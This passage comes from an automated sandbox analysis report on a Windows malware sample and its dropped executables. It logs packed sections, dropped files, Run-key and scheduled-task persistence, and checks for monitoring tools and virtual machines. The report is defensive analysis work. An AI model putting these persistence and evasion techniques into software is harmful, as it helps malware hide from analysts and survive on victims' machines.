Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .idata
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name:
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: letztgfz
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: rrfcshya
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: .taggant
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name:
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: .idata
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: pnhiajhq
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: lwmvjhen
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: .taggant
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: .idata
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name:
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: wehliqok
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: xquxcvvg
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B108BA push ecx; retf 0_3_00B108E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B0F8A4 push eax; ret 0_3_00B0F8A5
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00B0F8A8 pushad ; ret 0_3_00B0F8A9
Source: file.exe Static PE information: section name: entropy: 7.980382453594375
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: entropy: 7.982378905183867
Source: ST44OD0PMG8MCMYJRN4.exe.0.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe.0.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe.0.dr Static PE information: section name: entropy: 7.7930446616651725
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.982378905183867
Source: skotes.exe.3.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Source: random[1].exe.9.dr Static PE information: section name: entropy: 7.980382453594375
Source: 26e226f915.exe.9.dr Static PE information: section name: entropy: 7.980382453594375
Source: random[1].exe0.9.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: ef2532c0b1.exe.9.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: entropy: 7.982378905183867
Source: J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe.13.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Source: PPP8FUHMDUG38MZT5OEEJAB.exe.13.dr Static PE information: section name: letztgfz entropy: 7.95471366265782
Source: 1USEAVXFST1CCUTT4RKEBB0FQ1.exe.13.dr Static PE information: section name: entropy: 7.7930446616651725
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: entropy: 7.982378905183867
Source: TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe.28.dr Static PE information: section name: wehliqok entropy: 7.9535486843252885
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001229001\num.exe
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe File created: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 90bef5afae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ef2532c0b1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26e226f915.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26e226f915.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26e226f915.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ef2532c0b1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ef2532c0b1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 90bef5afae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 90bef5afae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
